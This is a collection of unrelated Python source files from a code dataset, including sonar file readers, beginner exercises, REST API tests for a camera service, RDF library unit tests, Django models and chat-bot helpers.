_check_sbet_file(sbet_file)
return sbet.is_sbet(sbet_file)
def is_smrmsg(smrmsg_file: str):
"""
Check if the file is an smrmsg file. Ideally we just rely on the checking if the file contains an even number of 10 doubles,
but add in the time check just in case.
Parameters
----------
smrmsg_file
file path to a POSPac smrmsg file
Returns
-------
bool
True if file is an smrmsg, False if not
"""
_check_sbet_file(smrmsg_file)
return sbet.is_smrmsg(smrmsg_file)
def read_soundvelocity_file(svp_file: str):
"""
Export out the information in the svp file as a dict. Keys include 'number_of_profiles', 'svp_julian_day',
'svp_time_utc', 'latitude', 'longitude', 'source_epsg', 'utm_zone', 'utm_hemisphere', 'number_of_layers', 'profiles'.
Returns
-------
dict
dictionary of the class information
"""
_check_svp_file(svp_file)
svp_object = svp.CarisSvp(svp_file)
svp_dict = svp_object.return_dict()
return svp_dict
def _xyz_from_allfile(filname: str):
"""
function using par to pull out the xyz88 datagram and return the xyz for each ping. Times returned are a sum of
ping time and delay time (to match Kluster, I do this so that times are unique across sector identifiers).
Parameters
----------
filname
str, path to .all file
Returns
-------
np.array
2d numpy array (time, beam) of the alongtrack offsets from the xyz88 record
np.array
2d numpy array (time, beam) of the acrosstrack offsets from the xyz88 record
np.array
2d numpy array (time, beam) of the depth offsets from the xyz88 record
np.array
numpy array of the times from the xyz88 record
np.array
numpy array of the ping counter index from the xyz88 record
"""
pfil = par3.AllRead(filname)
pfil.mapfile()
num88 = len(pfil.map.packdir['88'])
numbeams = pfil.getrecord(88, 0).data['Depth'].shape[0]
dpths = np.zeros((num88, numbeams))
xs = np.zeros((num88, numbeams))
ys = np.zeros((num88, numbeams))
tms = np.zeros(num88)
cntrs = np.zeros(num88)
for i in range(num88):
try:
rec88 = pfil.getrecord(88, i)
rec78 = pfil.getrecord(78, i)
dpths[i, :] = rec88.data['Depth']
ys[i, :] = rec88.data['AcrossTrack']
xs[i, :] = rec88.data['AlongTrack']
tms[i] = rec88.time + rec78.tx_data.Delay[0] # match par sequential_read, ping time = timestamp + delay
cntrs[i] = rec88.Counter
except IndexError:
break
# ideally this would do it, but we have to sort by prim/stbd arrays when cntr/times are equal between heads for dual head
cntrsorted = np.argsort(cntrs)
tms = tms[cntrsorted]
xs = xs[cntrsorted]
ys = ys[cntrsorted]
dpths = dpths[cntrsorted]
cntrs = cntrs[cntrsorted]
pfil.close()
return xs, ys, dpths, tms, cntrs
def _xyz_from_kmallfile(filname: str):
"""
function using kmall to pull out the xyz88 datagram and return the xyz for each ping. Times returned are a sum of
ping time and delay time (to match Kluster, I do this so that times are unique across sector identifiers).
The kmall svcorrected soundings are rel ref point and not tx. We need to remove the reference point lever arm
to get the valid comparison with kluster. Kluster sv correct is rel tx.
Parameters
----------
filname
str, path to .all file
Returns
-------
np.array
2d numpy array (time, beam) of the alongtrack offsets from the MRZ record
np.array
2d numpy array (time, beam) of the acrosstrack offsets from the MRZ record
np.array
2d numpy array (time, beam) of the depth offsets from the MRZ record
np.array
numpy array of the times from the MRZ record
np.array
numpy array of the ping counter index from the MRZ record
"""
km = kmall.kmall(filname)
km.index_file()
numpings = km.Index['MessageType'].value_counts()["b'#MRZ'"]
numbeams = len(km.read_first_datagram('MRZ')['sounding']['z_reRefPoint_m'])
dpths = np.zeros((numpings, numbeams))
xs = np.zeros((numpings, numbeams))
ys = np.zeros((numpings, numbeams))
tms = np.zeros(numpings)
cntrs = np.zeros(numpings)
install = km.read_first_datagram('IIP')
read_count = 0
for offset, size, mtype in zip(km.Index['ByteOffset'],
km.Index['MessageSize'],
km.Index['MessageType']):
km.FID.seek(offset, 0)
if mtype == "b'#MRZ'":
dg = km.read_EMdgmMRZ()
xs[read_count, :] = np.array(dg['sounding']['x_reRefPoint_m'])
ys[read_count, :] = np.array(dg['sounding']['y_reRefPoint_m'])
# we want depths rel tx to align with our sv correction output
dpths[read_count, :] = np.array(dg['sounding']['z_reRefPoint_m']) - \
float(install['install_txt']['transducer_1_vertical_location'])
tms[read_count] = dg['header']['dgtime']
cntrs[read_count] = dg['cmnPart']['pingCnt']
read_count += 1
if read_count != numpings:
raise ValueError('kmall index count for MRZ records does not match actual records read')
cntrsorted = np.argsort(cntrs) # ideally this would do it, but we have to sort by prim/stbd arrays when cntr/times
# are equal between heads for dual head
tms = tms[cntrsorted]
xs = xs[cntrsorted]
ys = ys[cntrsorted]
dpths = dpths[cntrsorted]
cntrs = cntrs[cntrsorted]
km.closeFile()
return xs, ys, dpths, tms, cntrs
| 2.21875 | 2 |
01_Primeiros passos_Fundamentos/05_metros_centimentos.py | Basilio40/exercicios_Python | 0 | 12796837 | '''Faça um Programa que converta metros para centímetros.'''
# Resposta:
metro = float(input('Informe a media em metros: '))
cent = int(metro * 100)
print(f'Convertendo {metro}m em centímetros, temos: {cent}cm')
| 4.34375 | 4 |
test/test_cam_v1.py | dondemonz/RestApi | 0 | 12796838 | import requests
from model.json_check import *
from model.input_data import *
# Запрос на получение настроек всех объектов CAM
def test_GetV1AllCamerasCode200():
data = "success"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["status"]
assert data == n
def test_GetV1AllCamerasStatus401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
# Запрос на получение настроек объекта CAM
def test_GetV1CamerasByIdCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId, auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CamerasByIdCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId, auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CamerasByIdCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
#Запрос на получение поля status объекта CAM
def test_GetV1CameraStatusCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/status", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraStatusCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/status", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraStatusCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/status", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
# Запрос на получение поля rtsp объекта CAM
def test_GetV1CameraRtspCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraRtspCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraRtspCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/rtsp", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
# Запрос на получение поля rtsp/live объекта CAM
def test_GetV1CameraRtspLiveCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/live", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraRtspLiveCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/live", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraRtspLiveCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/rtsp/live", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
# Запрос на получение поля rtsp/archive объекта CAM
def test_GetV1CameraRtspArchiveCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/archive", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraRtspArchiveCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/archive", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraRtspArchiveCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/rtsp/archive", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
| 2.6875 | 3 |
main.py | tuttofaredigitale/hangman-game | 0 | 12796839 | import random
from impiccato_disegno import d_impiccato, logo
from parole_impiccato import lista_parole
scelta_parola = random.choice(lista_parole)
print(logo)
game_over = False
energia = len(d_impiccato)-1
campo_gioco = []
for i in scelta_parola:
campo_gioco += '_'
while not game_over:
indovina = input('Indovina la lettera: ')
for posizione in range(len(scelta_parola)):
lettera = scelta_parola[posizione]
if lettera == indovina:
campo_gioco[posizione] = lettera
print(f"{' '.join(campo_gioco)}")
if indovina not in scelta_parola:
print(f"Hai tentato con la lettera {indovina}, non è la lettera corretta. Hai perso una vita.")
energia -= 1
if energia == 0:
game_over = True
print(f"Hai perso! La parola corretta era {scelta_parola}")
if not '_' in campo_gioco:
game_over = True
print('Complimenti hai vinto!')
print(d_impiccato[energia])
| 3.421875 | 3 |
pythonbrasil/exercicios/decisao/DE resp 03.py | adinsankofa/python | 0 | 12796840 | fm = str(input("Digite o sexo - [M - Masculino] ou [F - Feminino]: "))
def foum():
if fm == "M":
print("M - Masculino")
if fm == "F":
print("F - Feminino")
def si():
while fm != "M" and fm != "F":
print("Sexo inválido, tente novamente!")
fm = str(input("Digite o sexo - [M - Masculino] ou [F - Feminino]: "))
foum()
si()
foum()
| 3.796875 | 4 |
python/tests/test_model.py | alexkreidler/oxigraph | 403 | 12796841 | import unittest
from pyoxigraph import *
XSD_STRING = NamedNode("http://www.w3.org/2001/XMLSchema#string")
XSD_INTEGER = NamedNode("http://www.w3.org/2001/XMLSchema#integer")
RDF_LANG_STRING = NamedNode("http://www.w3.org/1999/02/22-rdf-syntax-ns#langString")
class TestNamedNode(unittest.TestCase):
def test_constructor(self):
self.assertEqual(NamedNode("http://foo").value, "http://foo")
def test_string(self):
self.assertEqual(str(NamedNode("http://foo")), "<http://foo>")
def test_equal(self):
self.assertEqual(NamedNode("http://foo"), NamedNode("http://foo"))
self.assertNotEqual(NamedNode("http://foo"), NamedNode("http://bar"))
class TestBlankNode(unittest.TestCase):
def test_constructor(self):
self.assertEqual(BlankNode("foo").value, "foo")
self.assertNotEqual(BlankNode(), BlankNode())
def test_string(self):
self.assertEqual(str(BlankNode("foo")), "_:foo")
def test_equal(self):
self.assertEqual(BlankNode("foo"), BlankNode("foo"))
self.assertNotEqual(BlankNode("foo"), BlankNode("bar"))
self.assertNotEqual(BlankNode('foo'), NamedNode('http://foo'))
self.assertNotEqual(NamedNode('http://foo'), BlankNode('foo'))
class TestLiteral(unittest.TestCase):
def test_constructor(self):
self.assertEqual(Literal("foo").value, "foo")
self.assertEqual(Literal("foo").datatype, XSD_STRING)
self.assertEqual(Literal("foo", language="en").value, "foo")
self.assertEqual(Literal("foo", language="en").language, "en")
self.assertEqual(Literal("foo", language="en").datatype, RDF_LANG_STRING)
self.assertEqual(Literal("foo", datatype=XSD_INTEGER).value, "foo")
self.assertEqual(Literal("foo", datatype=XSD_INTEGER).datatype, XSD_INTEGER)
def test_string(self):
self.assertEqual(str(Literal("foo")), '"foo"')
self.assertEqual(str(Literal("foo", language="en")), '"foo"@en')
self.assertEqual(
str(Literal("foo", datatype=XSD_INTEGER)),
'"foo"^^<http://www.w3.org/2001/XMLSchema#integer>',
)
def test_equals(self):
self.assertEqual(Literal("foo", datatype=XSD_STRING), Literal("foo"))
self.assertEqual(
Literal("foo", language="en", datatype=RDF_LANG_STRING),
Literal("foo", language="en"),
)
self.assertNotEqual(NamedNode('http://foo'), Literal('foo'))
self.assertNotEqual(Literal('foo'), NamedNode('http://foo'))
self.assertNotEqual(BlankNode('foo'), Literal('foo'))
self.assertNotEqual(Literal('foo'), BlankNode('foo'))
class TestTriple(unittest.TestCase):
def test_constructor(self):
t = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(t.subject, NamedNode("http://example.com/s"))
self.assertEqual(t.predicate, NamedNode("http://example.com/p"))
self.assertEqual(t.object, NamedNode("http://example.com/o"))
def test_mapping(self):
t = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(t[0], NamedNode("http://example.com/s"))
self.assertEqual(t[1], NamedNode("http://example.com/p"))
self.assertEqual(t[2], NamedNode("http://example.com/o"))
def test_destruct(self):
(s, p, o) = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(s, NamedNode("http://example.com/s"))
self.assertEqual(p, NamedNode("http://example.com/p"))
self.assertEqual(o, NamedNode("http://example.com/o"))
def test_string(self):
self.assertEqual(
str(
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
),
"<http://example.com/s> <http://example.com/p> <http://example.com/o> .",
)
class TestQuad(unittest.TestCase):
def test_constructor(self):
t = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(t.subject, NamedNode("http://example.com/s"))
self.assertEqual(t.predicate, NamedNode("http://example.com/p"))
self.assertEqual(t.object, NamedNode("http://example.com/o"))
self.assertEqual(t.graph_name, NamedNode("http://example.com/g"))
self.assertEqual(
t.triple,
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
),
)
self.assertEqual(
Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
),
Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
DefaultGraph(),
),
)
def test_mapping(self):
t = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(t[0], NamedNode("http://example.com/s"))
self.assertEqual(t[1], NamedNode("http://example.com/p"))
self.assertEqual(t[2], NamedNode("http://example.com/o"))
self.assertEqual(t[3], NamedNode("http://example.com/g"))
def test_destruct(self):
(s, p, o, g) = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(s, NamedNode("http://example.com/s"))
self.assertEqual(p, NamedNode("http://example.com/p"))
self.assertEqual(o, NamedNode("http://example.com/o"))
self.assertEqual(g, NamedNode("http://example.com/g"))
def test_string(self):
self.assertEqual(
str(
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
),
"<http://example.com/s> <http://example.com/p> <http://example.com/o> .",
)
class TestVariable(unittest.TestCase):
def test_constructor(self):
self.assertEqual(Variable("foo").value, "foo")
def test_string(self):
self.assertEqual(str(Variable("foo")), "?foo")
def test_equal(self):
self.assertEqual(Variable("foo"), Variable("foo"))
self.assertNotEqual(Variable("foo"), Variable("bar"))
if __name__ == "__main__":
unittest.main()
| 3.015625 | 3 |
Modules-in-python/getpass/getpass-getpass-function.py | tverma332/python3 | 3 | 12796842 | import getpass # importing getpass
dpass = getpass.getpass(prompt = "Enter the password: ") # by default it shows 'password'
print(f"The entered password is {dpass}") | 3.375 | 3 |
filtering_posts/models.py | Unkorunk/filtering-posts | 0 | 12796843 | from django.db import models
import datetime
class Region(models.Model):
name = models.CharField(max_length=200)
class University(models.Model):
address = models.CharField(max_length=255)
affilation_name = models.CharField(max_length=255)
author_count = models.IntegerField(default=0)
city = models.CharField(max_length=200)
country = models.CharField(max_length=200)
date_created = models.DateField()
document_count = models.IntegerField(default=0)
eid = models.CharField(max_length=200)
identifier = models.CharField(max_length=200)
org_domain = models.CharField(max_length=200)
org_type = models.CharField(max_length=200)
org_url = models.CharField(max_length=200)
postal_code = models.CharField(max_length=200)
scopus_affiliation_link = models.CharField(max_length=200)
search_link = models.CharField(max_length=200)
self_link = models.CharField(max_length=200)
state = models.ForeignKey(Region, on_delete=models.CASCADE)
url = models.CharField(max_length=200)
lat = models.FloatField(default=0.0)
lon = models.FloatField(default=0.0)
class Author(models.Model):
affilation_current = models.ForeignKey(University, on_delete=models.CASCADE)
citation_count = models.IntegerField(default=0)
cited_by_count = models.IntegerField(default=0)
coauthor_count = models.IntegerField(default=0)
coauthor_link = models.CharField(max_length=255)
date_created = models.DateField()
document_count = models.IntegerField(default=0)
eid = models.CharField(max_length=200)
given_name = models.CharField(max_length=200)
h_index = models.CharField(max_length=100)
identifier = models.CharField(max_length=100)
indexed_name = models.CharField(max_length=100)
initials = models.CharField(max_length=100)
orc_id = models.CharField(max_length=100)
publication_range = models.CharField(max_length=100)
scopus_author_link = models.CharField(max_length=255)
search_link = models.CharField(max_length=255)
self_link = models.CharField(max_length=255)
status = models.CharField(max_length=100)
surname = models.CharField(max_length=100)
url = models.CharField(max_length=255)
school_name = models.CharField(max_length=255, default='')
russian_fullname = models.CharField(max_length=255, default='')
job_category = models.CharField(max_length=255, default='')
job_position = models.CharField(max_length=255, default='')
job_unit = models.CharField(max_length=255, default='')
job_parent_unit = models.CharField(max_length=255, default='')
job_rate = models.CharField(max_length=255, default='0.0')
type_employment = models.CharField(max_length=255, default='')
date_birth = models.DateField(default=datetime.date(1900, 1, 1))
last_degree = models.CharField(max_length=255, default='')
phd = models.BooleanField(default=False)
last_academic_title = models.CharField(max_length=255, default='')
relevant = models.BooleanField(default=False)
class Journal(models.Model):
sourcetitle = models.CharField(max_length=255)
abbreviation = models.CharField(max_length=200)
type_journal = models.CharField(max_length=100)
issn = models.CharField(max_length=100)
source_id = models.IntegerField(null=True)
cnt_publications = models.IntegerField(default=0)
class Document(models.Model):
class Meta:
db_table = 'api_document'
eid = models.CharField(max_length=200)
doi = models.CharField(max_length=200)
pii = models.CharField(max_length=200, default="-1")
pubmed_id = models.CharField(max_length=200)
title = models.CharField(max_length=255)
subtype = models.CharField(max_length=200)
# subtype_description = models.CharField(max_length=200)
creator = models.ForeignKey(Author, on_delete=models.CASCADE)
author_count = models.IntegerField(default=0)
cover_date = models.DateField()
cover_display_date = models.CharField(max_length=200)
publication_name = models.CharField(max_length=255)
issn = models.ForeignKey(Journal, on_delete=models.CASCADE)
source_id = models.CharField(max_length=200)
eIssn = models.CharField(max_length=200)
aggregation_type = models.CharField(max_length=200)
volume = models.CharField(max_length=100, default="0")
issue_identifier = models.CharField(max_length=200)
article_number = models.CharField(max_length=200)
page_range = models.CharField(max_length=200, default="-1")
description = models.TextField()
authkeywords = models.TextField()
citedby_count = models.IntegerField(default=0)
openaccess = models.IntegerField(default=0)
fund_acr = models.CharField(max_length=200)
fund_no = models.CharField(max_length=200)
fund_sponsor = models.CharField(max_length=200)
citation_by_year = models.TextField(default="")
citation_by_year_with_self = models.TextField(default="")
class Subject(models.Model):
name = models.CharField(max_length=200)
full_name = models.CharField(max_length=255)
class DocumentSubject(models.Model):
id_doc = models.ForeignKey(Document, on_delete=models.CASCADE, default=0)
id_sub = models.ForeignKey(Subject, on_delete=models.CASCADE, default=0)
class AuthorJournal(models.Model):
id_auth = models.ForeignKey(Author, on_delete=models.CASCADE, default=0)
id_journal = models.ForeignKey(Journal, on_delete=models.CASCADE, default=0)
class AuthorUniversity(models.Model):
id_auth = models.ForeignKey(Author, on_delete=models.CASCADE, default=0)
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0)
class DocumentAuthorUniversity(models.Model):
id_doc = models.ForeignKey(Document, on_delete=models.CASCADE, default=0, null=True)
id_auth = models.ForeignKey(Author, on_delete=models.CASCADE, default=0, null=True)
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0, null=True)
class AuthorSubject(models.Model):
id_author = models.ForeignKey(Author, on_delete=models.CASCADE)
id_sub = models.ForeignKey(Subject, on_delete=models.CASCADE)
class DocumentUniversityAffiliations(models.Model):
id_doc = models.ForeignKey(Document, on_delete=models.CASCADE, default=0, null=True)
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0, null=True)
class Rankings(models.Model):
name = models.CharField(max_length=255)
class UniversityRankPlace(models.Model):
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0)
id_ranking = models.ForeignKey(Rankings, on_delete=models.CASCADE, default=0)
year = models.IntegerField(default=0)
place = models.CharField(max_length=255, default="")
class UniversityRankCriteria(models.Model):
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0)
id_ranking = models.ForeignKey(Rankings, on_delete=models.CASCADE, default=0)
criteria = models.CharField(max_length=255, default="")
score = models.FloatField(default=0.0)
class DateCitationCount(models.Model):
date = models.DateField(auto_now=True)
citation_count = models.IntegerField(default=0)
self_citation_count = models.IntegerField(default=0)
| 2.125 | 2 |
graphtransliterator/transliterators/__init__.py | seanpue/graphtransliterator | 4 | 12796844 | <filename>graphtransliterator/transliterators/__init__.py
# -*- coding: utf-8 -*-
"""
graphtransliterator.transliterators
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bundled transliterators are loaded by explicitly importing
:mod:`graphtransliterator.transliterators`. Each is an instance of
:mod:`graphtransliterator.bundled.Bundled`.
"""
from .bundled import Bundled # noqa
from .schemas import MetadataSchema # noqa
import inspect
import pkgutil
__all__ = ['Bundled', 'MetadataSchema', 'iter_names', 'iter_transliterators']
_transliterators = []
def _skip_class_name(name):
"""Determine if the class name should be skipped."""
return name == "Bundled" or name.startswith("_")
def add_transliterators(path=__path__):
"""Walk submodules and loads bundled transliterators into namespace.
Bundled transliterators are stored as ``Bundled`` subclass.
Parameters
----------
path : list
List of paths, must be an iterable of strings
Raises
------
ValueError
A transliterator of the same name already has been loaded."""
for loader, module_name, is_pkg in pkgutil.walk_packages(path):
# if it is not a submodule, skip it.
if not is_pkg:
continue
_module = loader.find_module(module_name).load_module(module_name)
for name, _obj in inspect.getmembers(_module, inspect.isclass):
# Skip Bundled, as it is already loaded
# Skip any classes starting with _
if _skip_class_name(name):
continue
if name in __all__:
raise ValueError(
'A transliterator named "{}" already exists'.format(name)
)
# import module and add class to globals, so that it will show up as
# graphtransliterator.transliterators.TRANSLITERATORNAME
assert len(_module.__path__) == 1 # There should be only one path
globals()[name] = getattr(_module, name)
__all__.append(name)
_transliterators.append(name)
add_transliterators()
def iter_names():
"""Iterate through bundled transliterator names."""
for _ in _transliterators:
yield _
def iter_transliterators(**kwds):
"""Iterate through instances of bundled transliterators."""
for _ in iter_names():
yield (eval(_ + "()"))
| 2.28125 | 2 |
employee_portal/chat_bots/sender_bots.py | Dmitriy200123/employee_portal | 0 | 12796845 | import enum
import datetime
from chat_bots.models import Sender
from slack_bot.bot import SlackBot
from telegram_bot.bot import TelegramBot
class MessengerType(enum.Enum):
Telegram = 'Telegram'
Slack = 'Slack'
class SenderBots:
new_employee_channel_id = None
new_employee_chat_bot = None
access_request_channel_id = None
access_request_chat_bot = None
@staticmethod
def updateBots():
sender = Sender.objects.first()
if sender:
employee_chat_bot = sender.newEmployeeChatBot
access_chat_bot = sender.accessRequestChatBot
SenderBots.new_employee_channel_id = sender.newEmployeeChannelId
SenderBots.access_request_channel_id = sender.accessRequestChannelId
SenderBots.new_employee_chat_bot = SenderBots.createBot(employee_chat_bot)
SenderBots.access_request_chat_bot = SenderBots.createBot(access_chat_bot)
@staticmethod
def createBot(chat_bot):
if chat_bot.botType.messenger_type == MessengerType.Telegram.name:
return TelegramBot(chat_bot.token)
if chat_bot.botType.messenger_type == MessengerType.Slack.name:
return SlackBot(chat_bot.token)
@staticmethod
def getCorrectTime():
time = Sender.objects.filter(newEmployeeChannelId=SenderBots.new_employee_channel_id).first().sendTime
now = datetime.datetime.now().time()
date = datetime.date.today()
if time < now:
date = date + datetime.timedelta(days=1)
return datetime.datetime.combine(date, time)
@staticmethod
def sendNewEmployeeMessage(data):
message = f"Новый сотрудник: {data['first_name']} {data['second_name']}. Отдел: {data['department']}," \
f" должность: {data['position']}"
correct_time = SenderBots.getCorrectTime()
SenderBots.new_employee_chat_bot.post_scheduled_message(date=correct_time, message=message,
channel_id=SenderBots.new_employee_channel_id)
@staticmethod
def sendAccessEmployeeMessage(user, services):
message = f"{user.first_name} {user.second_name} запрашивает доступ к следующим сервисам: {', '.join(services)}"
correct_time = SenderBots.getCorrectTime()
SenderBots.access_request_chat_bot.post_scheduled_message(date=correct_time, message=message,
channel_id=SenderBots.new_employee_channel_id)
if Sender.objects.first():
SenderBots.updateBots()
| 2.3125 | 2 |
scripts/generate_gantt_chart.py | spisakt/PUMI | 5 | 12796846 | <reponame>spisakt/PUMI
#!/usr/bin/env python
# start it like: scripts/generate_gantt_chart.py
# from the project folder
import PUMI.utils.resource_profiler as rp
rp.generate_gantt_chart('/Users/tspisak/Dropbox/comp/PAINTeR/szeged/run_stats.log', cores=8) | 1.429688 | 1 |
zvt/domain/quotes/coin/coin_tick_kdata.py | manstiilin/zvt | 1 | 12796847 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from sqlalchemy.ext.declarative import declarative_base
# 数字货币tick
from zvdata.contract import register_schema
from zvt.domain.quotes.coin import CoinTickCommon
CoinTickKdataBase = declarative_base()
class CoinTickKdata(CoinTickKdataBase, CoinTickCommon):
__tablename__ = 'coin_tick_kdata'
register_schema(providers=['ccxt'], db_name='coin_tick_kdata', schema_base=CoinTickKdataBase)
| 1.929688 | 2 |
cui/register/auth/GiHubApi.Authorizations.List.20170109081152453/AccountGetter.py | ytyaru/GitHub.Upload.UserRegister.Insert.Token.201704031122 | 0 | 12796848 | <reponame>ytyaru/GitHub.Upload.UserRegister.Insert.Token.201704031122
#!python3
#encoding:utf-8
import sqlite3
#from AuthList import AuthList
import AuthList
import traceback
import pyotp
class AccountGetter:
def __init__(self):
def connect(self, db_path):
self.connector = sqlite3.connect(db_path)
self.cursor = connector.cursor()
| 1.984375 | 2 |
src/preprocessing/nodes_manager.py | NelloCarotenuto/Targeting-with-Partial-Incentives | 0 | 12796849 | import math
import random
__BASE_SEED = 1
def constant_thresholds(graph, value):
"""Sets a constant threshold for every node of the graph."""
# Store threshold assignment in a dictionary
thresholds = dict()
# Add a constant attribute to each node
for node in graph.Nodes():
thresholds[node.GetId()] = value
return thresholds
def degree_proportional_thresholds(graph, fraction=0.5):
"""Sets a threshold for every node of the graph to be proportional to its in-degree."""
# Store threshold assignment in a dictionary
thresholds = dict()
# Compute the threshold based on the in-degree and add it to every node
for node in graph.Nodes():
degree = node.GetInDeg()
threshold = math.floor(degree * fraction) + 1
thresholds[node.GetId()] = threshold
return thresholds
def random_thresholds(graph, seed):
"""Sets a threshold for every node of the graph to be a random integer between 1 and its degree."""
# Store threshold assignment in a dictionary
thresholds = dict()
# Set the random seed to be able to reproduce results
random.seed(__BASE_SEED + seed)
# Add a random attribute to each node
for node in graph.Nodes():
thresholds[node.GetId()] = random.randint(1, node.GetDeg())
return thresholds
| 3.859375 | 4 |
entity_relation_extraction/testmasp.py | Zeng-WH/MaterBERT | 5 | 12796850 | <reponame>Zeng-WH/MaterBERT
import json
import os
import glob
'''将MSP的语料库转化成可以识别的格式'''
def find_all(sub, s):
index_list = []
index = s.find(sub)
while index != -1:
index_list.append(index)
index = s.find(sub, index + 1)
if len(index_list) > 0:
return index_list
else:
return -1
'''
with open('./mspcorpus/101002adma200903953.txt') as f1:
text = f1.read()
with open('./mspcorpus/101002adma200903953.ann') as f2:
ann = f2.read()
text1 = text.split('\n')
space_all = find_all(' ', text)
line_all = find_all('\n', text)
line_all.append(10000000)
text_list = []
for i in range(len(line_all)-1):
temp_list = []
temp_list.append(line_all[i]+1)
for j in space_all:
if j>=line_all[i] and j<=line_all[i+1]:
temp_list.append(j+1)
text_list.append(temp_list)
#print(text[text_list[1][-1]])
ann_list = ann.split('\n')
entity_list = []
for ann_line in ann_list:
ann_line = ann_line.split('\t')
if len(ann_line)>2:
if ann_line[0][0] == 'T':
entity_list.append(ann_line)
#print('bupt')
'''
def convert_text(text):
space_all = find_all(' ', text)
line_all = find_all('\n', text)
line_all.append(10000000)
text_list = []
for i in range(len(line_all) - 1):
temp_list = []
temp_list.append(line_all[i] + 1)
for j in space_all:
if j >= line_all[i] and j <= line_all[i + 1]:
temp_list.append(j + 1)
